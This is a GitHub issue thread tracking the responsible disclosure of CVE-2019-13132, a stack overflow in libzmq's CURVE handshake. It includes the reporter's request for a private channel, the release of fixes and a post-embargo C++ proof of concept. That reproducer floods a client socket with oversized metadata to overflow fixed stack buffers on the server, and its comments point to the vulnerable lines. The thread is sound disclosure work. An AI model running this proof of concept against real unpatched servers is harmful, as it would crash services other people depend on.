New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
CVE-2019-13132: denial of service via stack overflow #3558
Comments
|
@fangpenlin we added a policy and contact details at https://github.com/zeromq/libzmq/security/policy |
|
The embargo is now over, here's a coarse description of the problem: A remote, unauthenticated client connecting to a Releases will be out in a few moments. |
|
Closing as it's solved, but feel free to comment with more details. Due to sensitivity the code to reproduce the issue will be published on July 15th at 16:00 UTC. |
|
Published on oss-security: https://www.openwall.com/lists/oss-security/2019/07/08/6 |
|
@myd7349 FYI for vcpkg |
|
homebrew bottles have been updated in Homebrew/homebrew-core#41716 |
|
Thank you! |
|
vcpkg's |
|
Thanks! |
|
Based on the previous discussion, it has been one week passed, there should be enough time for patching, so here I am sharing the reproducer: #include <string>
#include <czmq.h>
#include <zmq.h>
int main() {
zsys_init();
// Generate CurveZMQ certificates (public/private key pairs actually) for server and client
zcert_t *serverCert = zcert_new ();
zcert_t *clientCert = zcert_new ();
// Setup client socket
zsock_t* serverSocket = zsock_new(ZMQ_ROUTER);
// make server to use CURVE secure connection mode
zsock_set_curve_server(serverSocket, 1);
// set the server secret key
zsock_set_curve_secretkey(serverSocket, zcert_secret_txt(serverCert));
assert(zsock_bind(serverSocket, "tcp://127.0.0.1:7777") != -1);
// Setup server socket
zsock_t* clientSocket = zsock_new(ZMQ_DEALER);
// Set the server public key
zsock_set_curve_serverkey(clientSocket, zcert_public_txt(serverCert));
// Set the key pair of client
zsock_set_curve_secretkey(clientSocket, zcert_secret_txt(clientCert));
zsock_set_curve_publickey(clientSocket, zcert_public_txt(clientCert));
// Set metadata property of the client socket
// This basically set a tons of data into socket metadata, and ZMQ will use it to generate a handshake package
// for CurveCP auth schema:
//
// https://github.com/zeromq/libzmq/blob/master/src/curve_client.cpp#L182
//
// We make the size huge so that it will overflow
for (size_t i = 0; i < 200; ++i ) {
std::string property(
std::string("X-Property") + std::to_string(i) + std::string(":ABCDEFG0123456789")
);
assert(zmq_setsockopt (zsock_resolve(clientSocket), ZMQ_METADATA, property.c_str(), property.size()) == 0);
}
// This will initiate the connection to server with our CurveCP auth package and the oversize metadata in it.
// 1. Server will get the message payload here:
//
// https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L274-L275
//
// 2. The size `clen` is calculated based on the payload size minus a fixed length of other part in the payload
//
// https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L327
//
// 3. The memory for decrypting the crypto box are allocated in stack with fixed size
//
// https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L329-L331
//
// 4. The first overflow comes in, we copy the message data to fixed stack buffer array without boundary check
//
// https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L335-L336
//
// 5. The second overflow comes in, we try to decrypt the crypto box and put the oversize result into fixed
// stack buffer array
//
// https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L342-L343
//
assert(zsock_connect(clientSocket, "tcp://127.0.0.1:7777") != -1);
sleep(10);
zsys_shutdown();
return 0;
} |
|
Thank you! Here's another set that separates client and server: |
I found a critical security bug of libzmq and would like to report it confidentially, so that hopefully the bug can be fixed before we disclose it. It appears the only information I can find about reporting security bug is here in FAQ
http://zeromq.org/area:faq#toc9
Besides opening an issue here, do you folks have an email address and corresponding GPG key I can send the details of this bug over?
The text was updated successfully, but these errors were encountered: